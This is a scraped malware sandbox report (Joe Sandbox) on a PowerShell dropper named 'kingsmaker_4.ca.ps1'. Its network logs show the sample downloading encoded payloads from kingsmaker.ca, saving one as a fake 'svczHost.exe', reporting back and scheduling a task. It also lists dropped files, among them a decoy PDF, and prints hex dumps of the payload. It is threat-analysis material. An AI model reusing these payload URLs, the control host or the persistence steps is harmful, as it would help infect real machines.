2024-11-29 08:22:37 UTC	69	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
2024-11-29 08:22:37 UTC	1000	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:37 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uznKFyPlHiIeo1l1%2BofSylFl%2Bqcot5BwtQwv16pmLUQyTOxSmpZKsvTQ%2F2G%2BTIJSF9jIRGk0Z8KlE6qHiP3zRff0i3rQcMCXouhfYgOsLXNIzJHUridl%2ByZ%2FIzQrON%2B4orFW2TsF9c69"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19654&min_rtt=1009&rtt_var=25957&sent=81&recv=83&lost=0&retrans=0&sent_bytes=53040&recv_bytes=39774&delivery_rate=16021947&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea130e46d63a982-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158896&min_rtt=158881&rtt_var=33529&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1012&delivery_rate=24105&cwnd=252&unsent_bytes=0&cid=aeee7bf533a1d764&ts=652&x=0"

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kingsmaker_4.ca.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\TESTING

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.json

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Job Description.pdf

C:\Users\user\AppData\Local\Temp\RES4364.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32531o51.e0k.ps1

Windows Analysis Report
kingsmaker_4.ca.ps1

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:38 UTC	332	OUT	GET /file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca
2024-11-29 08:22:38 UTC	1112	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:38 GMT Content-Type: application/octet-stream Content-Length: 8351232 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n8FxMxdW%2BP6l0tFi7ZuKH2ylgXLKwyCgmmsCjvYIO3Q9pq4IyRUWpOqUvKwbMGD15puEQuTZ0%2BRIDFhWEgl8PUUhG3trjsOH5jqvUFkm4O1%2FER2ntKMGH%2Fi7zaPPC3nD7iRxVfsbbp7a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24298&min_rtt=1009&rtt_var=28755&sent=83&recv=85&lost=0&retrans=0&sent_bytes=53818&recv_bytes=40710&delivery_rate=16021947&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea130eaab3d69e6-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158686&min_rtt=158635&rtt_var=33540&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=970&delivery_rate=24125&cwnd=252&unsent_bytes=0&cid=a4dd89057796cd94&ts=683&x=0"
2024-11-29 08:22:38 UTC	257	IN	Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23 Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 03 0f 28 01 d5 46 01 01 47 38 01 01 15 16 01 e1 b7 0a 01 01 11 01 01 01 01 01 41 00 01 01 01 01 11 01 01 01 03 01 01 07 01 01 01 01 01 01 01 07 01 01 01 01 01 01 01 01 71 99 01 01 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11 01 01 Data Ascii: (FG8Aqa)Yi)UAqEQ1)A^/udyuy&
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 8a d1 e8 be d5 25 01 49 8c 04 99 d7 4f 01 49 8c 0c 88 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a3 d5 25 01 49 8c 04 d2 d7 4f 01 49 8c 0c c5 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01 49 82 Data Ascii: %IOIOI8tI%IOIOI8tI%IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIOI
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 01 49 8c 04 04 db 4f 01 49 8c 0c f7 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4e ce 25 01 49 8c 04 11 db 4f 01 49 8c 0c 00 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 33 ce 25 01 49 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00 c2 49 Data Ascii: IOIOI8tIN%IOIOI8tI3%I:OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8tI
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 82 38 01 74 00 c2 49 8a d1 e8 e7 c8 25 01 49 8c 04 96 57 90 01 49 8a 01 49 8c 0c a4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c8 25 01 49 8c 04 8e 57 90 01 49 8a 01 49 8c 0c 74 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 Data Ascii: 8tI%IWIIOI8tI%IWIItOI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,O
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 8c 0c ac c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c5 25 01 49 8c 04 c6 52 90 01 49 8a 01 49 8c 0c 94 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c5 25 01 49 8c 04 ae 52 90 01 49 8a 01 49 8c 0c 7c c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c5 25 01 49 8c 04 96 52 90 01 49 8a 01 49 8c 0c 64 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c5 25 01 49 8c 04 8e 52 90 01 49 8a 01 49 8c 0c 64 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c5 25 01 49 8c 04 76 52 90 01 49 8a 01 49 8c 0c 4c c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c2 25 01 49 8c 04 5e 52 90 01 49 8a 01 49 8c 0c 34 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c2 25 01 49 8c 04 4e 52 90 01 49 8a 01 49 8c 0c 34 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c2 25 01 49 8c 04 46 52 90 01 49 8a 01 Data Ascii: OI8tI%IRIIOI8tIg%IRII\|OI8tIG%IRIIdOI8tI'%IRIIdOI8tI%IvRIILOI8tI%I^RII4OI8tI%INRII4OI8tI%IFRI
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 50 90 01 49 8a 01 49 8c 0c dc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 be 25 01 49 8c 04 fe 51 90 01 49 8a 01 49 8c 0c d4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 be 25 01 49 8c 04 ee 51 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bf 25 01 49 8c 04 ee 51 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bf 25 01 49 8c 04 d6 51 90 01 49 8a 01 49 8c 0c d4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bf 25 01 49 8c 04 be 51 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bf 25 01 49 8c 04 a6 51 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bf 25 01 49 8c 04 8e 51 90 01 49 8a 01 49 8c 0c ac c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bf 25 01 49 8c 04 Data Ascii: PIIOI8tI'%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tIg%IQIIOI8tIG%I
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: b8 25 01 49 8c 04 46 4f 90 01 49 8a 01 49 8c 0c dc c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b8 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c c4 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b8 25 01 49 8c 04 5e 4f 90 01 49 8a 01 49 8c 0c ac c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b8 25 01 49 8c 04 4e 4f 90 01 49 8a 01 49 8c 0c 94 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b8 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c 7c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b8 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c 6c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b8 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c 6c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b8 25 01 49 8c 04 36 4f 90 01 49 8a 01 49 8c 0c 64 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 Data Ascii: %IFOIIOI8tI%IvOIIOI8tI%I^OIIOI8tI%INOIIOI8tIg%IVOII\|OI8tIG%I>OIIlOI8tI'%I>OIIlOI8tI%I6OIIdOI8tI
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 00 c2 49 8a d1 e8 87 b5 25 01 49 8c 04 06 4c 90 01 49 8a 01 49 8c 0c 4c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b5 25 01 49 8c 04 ee 4d 90 01 49 8a 01 49 8c 0c 34 c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b5 25 01 49 8c 04 d6 4d 90 01 49 8a 01 49 8c 0c 1c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b5 25 01 49 8c 04 be 4d 90 01 49 8a 01 49 8c 0c 04 c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b5 25 01 49 8c 04 a6 4d 90 01 49 8a 01 49 8c 0c ec c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b2 25 01 49 8c 04 8e 4d 90 01 49 8a 01 49 8c 0c d4 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b2 25 01 49 8c 04 76 4d 90 01 49 8a 01 49 8c 0c bc c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b2 25 01 49 8c 04 5e 4d 90 01 49 8a 01 49 8c 0c a4 c1 4f 01 49 82 38 01 Data Ascii: I%ILIILOI8tIg%IMII4OI8tIG%IMIIOI8tI'%IMIIOI8tI%IMIIOI8tI%IMIIOI8tI%IvMIIOI8tI%I^MIIOI8
2024-11-29 08:22:38 UTC	1369	IN	Data Raw: 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 ae 25 01 49 8c 04 8e 4a 90 01 49 8a 01 49 8c 0c ac be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 ae 25 01 49 8c 04 ee 4a 90 01 49 8a 01 49 8c 0c fc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 af 25 01 49 8c 04 46 4d 90 01 49 8a 01 49 8c 0c 44 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 af 25 01 49 8c 04 66 4d 90 01 49 8a 01 49 8c 0c 54 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 af 25 01 49 8c 04 9e 4d 90 01 49 8a 01 49 8c 0c 6c c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 af 25 01 49 8c 04 ce 4c 90 01 49 8a 01 49 8c 0c 5c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 af 25 01 49 8c 04 36 4e 90 01 49 8a 01 49 8c 0c 8c c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 af 25 01 49 8c 04 66 4e 90 01 49 8a 01 49 8c 0c b4 Data Ascii: OI8tI'%IJIIOI8tI%IJIIOI8tI%IFMIIDOI8tI%IfMIITOI8tI%IMIIlOI8tI%ILII\OI8tIg%I6NIIOI8tIG%IfNII

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:48 UTC	284	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 200
2024-11-29 08:22:48 UTC	200	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
2024-11-29 08:22:48 UTC	999	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:48 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8tWPnMYRJVfnf%2B5HSkKo%2BpFgOUJnUBOfAKVRcI%2BCtxz8cXbrOi%2BKRO8uHN50jK8nPVQxXQB1r6bIQgUfyiB3at4qW4ovhU0%2BMVtNQn5PM1h40FKk2WriLZIAgJnr7oJLQ1UAmvkGFio"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5601&min_rtt=960&rtt_var=8868&sent=5953&recv=2847&lost=0&retrans=0&sent_bytes=8409526&recv_bytes=50901&delivery_rate=20207612&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea131287be309f7-LAS server-timing: cfL4;desc="?proto=TCP&rtt=159279&min_rtt=158705&rtt_var=34348&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1144&delivery_rate=23867&cwnd=252&unsent_bytes=0&cid=daeaf1fa90e719f7&ts=654&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:49 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 97
2024-11-29 08:22:49 UTC	97	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
2024-11-29 08:22:49 UTC	996	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:49 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beaVrNwxbUsGT%2F2SfbBjwTa%2FSfQHYppZ6hMRiE0DKZ5rMPywFoEifnEz%2FonBbd%2FIJlzcowJy%2B636u%2FGkpfTZ0EFL6kLdsbYd1JvWVQ29xSty0CEUoicrMXYMoYITQG5VHPCJPVffoecl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21717&min_rtt=1161&rtt_var=29183&sent=25&recv=38&lost=0&retrans=0&sent_bytes=4949&recv_bytes=25975&delivery_rate=2403292&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1312ea977a984-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158927&min_rtt=158903&rtt_var=33549&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1040&delivery_rate=24095&cwnd=252&unsent_bytes=0&cid=65807e48b009c3ba&ts=662&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:51 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 64
2024-11-29 08:22:51 UTC	64	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
2024-11-29 08:22:52 UTC	992	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:52 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v3ORMq6OFufjGvLsreMVz8KB1wJGGzc4hkqIoujuqDIvKmrF%2BlcXCH4OwEwXArlVcPAM7wRYytEx%2FlbjXVCBDcLgzQeZxL8FQksf%2BRm5wGtgmaNDHys9j8Ys25Q1%2BalGpBdpjfMKg9GQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25929&min_rtt=1161&rtt_var=30312&sent=28&recv=41&lost=0&retrans=0&sent_bytes=5723&recv_bytes=26824&delivery_rate=2403292&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1313e0bd60acf-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158894&min_rtt=158773&rtt_var=33679&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1007&delivery_rate=24067&cwnd=252&unsent_bytes=0&cid=f15bacb06e779d63&ts=653&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:23:26 UTC	63	OUT	GET /StaticFile/RdpService/52 HTTP/1.1 Host: kingsmaker.ca
2024-11-29 08:23:27 UTC	1153	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:23:26 GMT Content-Type: application/octet-stream Content-Length: 9429504 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: 10C767E2635167724D6A03475ED8F7A9 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7w%2Ba5F9i7i7q4FCAEFUlryNtzSwx0a8%2BMOxiaLfk2GbPUmwLGC%2F25zh%2FOJC9Gqttkj5Wo%2FPKvGCmXxf7Ha0MvNl2PsqMpyH3YkAz3sA05HmuGtuJz75QcD%2BveeVI%2Ff1GosU58e0KLtZj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23856&min_rtt=1199&rtt_var=29531&sent=11&recv=13&lost=0&retrans=0&sent_bytes=3079&recv_bytes=4408&delivery_rate=30323&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea132173bd069e3-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158759&min_rtt=158675&rtt_var=33607&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=701&delivery_rate=24095&cwnd=252&unsent_bytes=0&cid=26d052be0b264229&ts=721&x=0"
